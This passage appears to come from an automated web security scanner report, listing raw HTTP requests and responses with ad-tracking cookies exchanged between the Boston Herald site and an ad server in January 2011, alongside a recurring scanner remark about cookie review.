acb64287=5_[r^208WMrO@Pn)IE.8.%R'i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxBYVBc7kOUMBWHfHSmrEELjPUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEBQkBAgUCAAIAAAAAByCzmwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252387%29%3Buf%28%27r%27%2C+151403%2C+1296252387%29%3Bppv%2882%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2884%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2811%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2882%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2884%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2887%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28619%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28620%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28621%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Fri, 28 Jan 2011 22:06:27 GMT Content-Length: 742
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-85794731_1296251888%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D262895%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.33319127024151385%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; acb217792=5_[r^208WMuF4Lw)IE.8._w.i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8xSvlfRzDIuBWHfHSmrEELlO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQElgQBAgUCAAIAAAAANCJDNAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251877%29%3Buf%28%27r%27%2C+151403%2C+1296251877%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2811%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2887%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28619%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28620%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28621%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb120773=5_[r^208WMuF4Lw)IE.826L=t?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP_MUEDZxdL5eBWHfHSmrEELwO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEoAUBAgUCAAIAAAAAaCEU6wAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251888%29%3Buf%28%27r%27%2C+151403%2C+1296251888%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2811%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2887%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28619%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28620%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28621%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Fri, 28 Jan 2011 21:58:08 GMT Content-Length: 743
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-79489099_1296252890%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D917199%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.6830512962769717%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb810948=5_[r^208WMuF4Lw)IE.8.Cw7k?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPzre96IF0ShCBWHfHSmrEELkPkNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEYAYBAgUCAAIAAAAAwyH-GwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252644%29%3Buf%28%27r%27%2C+151403%2C+1296252644%29%3Bppv%2882%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2884%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2811%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2882%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2884%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2887%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28619%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28620%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28621%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb810948=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb161789=5_[r^208WMM2x@N!@@-#c5UK9?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP3ReQm0PH-EwBWHfHSmrEEKCcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQELgkBAgUCAAIAAAAATiHU5gAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265346%29%3Buf%28%27r%27%2C+116344%2C+1296265346%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 29 Jan 2011 01:42:26 GMT Content-Length: 741
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-15295914_1296252644%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D156514%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.4698551066685468%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb64287=5_[r^208WMrO@Pn)IE.8.%R'i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxBYVBc7kOUMBWHfHSmrEELjPUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEBQkBAgUCAAIAAAAAByCzmwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252387%29%3Buf%28%27r%27%2C+151403%2C+1296252387%29%3Bppv%2882%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2884%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2811%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2882%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2884%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2887%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28619%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28620%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28621%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb64287=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb810948=5_[r^208WMuF4Lw)IE.8.Cw7k?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPzre96IF0ShCBWHfHSmrEELkPkNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEYAYBAgUCAAIAAAAAwyH-GwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252644%29%3Buf%28%27r%27%2C+151403%2C+1296252644%29%3Bppv%2882%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2884%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2811%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2882%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2884%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2887%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28619%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28620%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28621%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Fri, 28 Jan 2011 22:10:44 GMT Content-Length: 742
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
